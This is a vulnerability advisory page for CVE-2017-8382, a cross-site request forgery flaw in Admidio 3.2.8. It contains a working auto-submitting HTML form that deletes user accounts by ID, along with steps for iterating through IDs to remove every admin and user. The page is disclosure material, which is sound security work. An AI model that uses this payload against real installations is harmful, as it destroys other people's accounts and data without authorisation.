Admidio 3.2.8 Cross Site Request Forgery

Published
Credit
Risk
2017.05.16
Faiz Ahmed Zaidi
Medium
CWE
CVE
Local
Remote
CWE-352
CVE-2017-8382
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
3.5/10
2.9/10
6.8/10
Exploit range
Attack complexity
Authentication
Remote
Medium
Single time
Confidentiality impact
Integrity impact
Availability impact
None
None
Partial

# Exploit Title :Admidio 3.2.8 (CSRF to Delete Users)
# Date: 28/April/2017
# Exploit Author: Faiz Ahmed Zaidi Organization: Provensec LLC Website:
http://provensec.com/
# Vendor Homepage: https://www.admidio.org/
# Software Link: https://www.admidio.org/download.php
# Version: 3.2.8
# Tested on: Windows 10 (Xampp)
# CVE : CVE-2017-8382


[Suggested description]
Admidio 3.2.8 has CSRF in
adm_program/modules/members/members_function.php with
an impact of deleting arbitrary user accounts.

------------------------------------------

[Additional Information]
Using this crafted html form we are able to delete any user with
admin/user privilege.

<html>
<body onload="javascript:document.forms[0].submit()">
<form
action="http://localhost/newadmidio/admidio-3.2.8/adm_program/modules/members/members_function.php">

<input type="hidden" name="usr&#95;id" value='9' />
<input type="hidden" name="mode" value="3" />
</form>
</body>
</html>

[Affected Component]
http://localhost/newadmidio/admidio-3.2.8/adm_program/modules/members/members_function.php


------------------------------------------

[Attack Type]
Remote

------------------------------------------

[Impact Escalation of Privileges]
true

------------------------------------------

[Attack Vectors]
Steps:
1.) If an user with admin privilege opens a crafted
html/JPEG(Image),then both the admin and users with user privilege
which are mentioned by the user id (as like shown below) in the
crafted request are deleted.

<input type="hidden" name="usr&#95;id" value='3' />

2.) In admidio by default the userid starts from '0',
'1' for system '2' for users, so an attacker
can start from '2' upto 'n' users.

3.)For deleting the user permanently we select 'mode=3'(as like shown
below),then all admin/low privileged users are deleted.

<input type="hidden" name="mode" value="3" />

------------------------------------------

[Reference]
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

Thanks
Faiz Ahmed Zaidi


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com